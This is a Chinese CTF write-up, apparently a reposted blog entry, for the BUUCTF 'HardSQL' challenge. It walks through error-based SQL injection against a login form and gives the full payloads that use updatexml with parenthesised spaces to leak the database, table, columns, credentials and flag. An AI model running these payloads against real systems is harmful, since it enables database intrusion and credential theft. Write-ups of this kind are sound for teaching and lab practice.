1、burpsuit抓包,跑一下fuzz
![BUUCTF[极客大挑战 2019]HardSQL](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/22/20220723002851707.jpg)
发现长度为736的都被过滤掉了
![BUUCTF[极客大挑战 2019]HardSQL](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/22/20220723002854347.jpg)
2、观察error界面,猜测应该是报错注入
先爆数据库名
1 admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#、
0x7e代表~
![BUUCTF[极客大挑战 2019]HardSQL](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/22/20220723002856566.jpg)
得到数据库名geek
3、爆表名
1 admin'or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like('geek')),0x7e),1))#
![BUUCTF[极客大挑战 2019]HardSQL](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/22/20220723002858585.jpg)
4、查列名
1 admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#
![BUUCTF[极客大挑战 2019]HardSQL](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/22/20220723002900302.jpg)
5、看字段名
1 admin'or(updatexml(1,concat(0x7e,(select(group_concat(id,'~',username,'~',password))from(H4rDsq1)),0x7e),1))#
![BUUCTF[极客大挑战 2019]HardSQL](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/22/20220723002927343.jpg)
1 admin'or(updatexml(1,concat(0x7e,(select(right(password,35))from(H4rDsq1)),0x7e),1))#
![BUUCTF[极客大挑战 2019]HardSQL](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/22/20220723004316292.jpg)
1 admin'or(updatexml(1,concat(0x7e,(select(right(password,30))from(H4rDsq1)),0x7e),1))#
![BUUCTF[极客大挑战 2019]HardSQL](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/22/20220723004338828.jpg)
flag{de3b1418-5464-4898-93b1-d426e57889b3}
原创文章,作者:,如若转载,请注明出处:https://blog.ytso.com/276297.html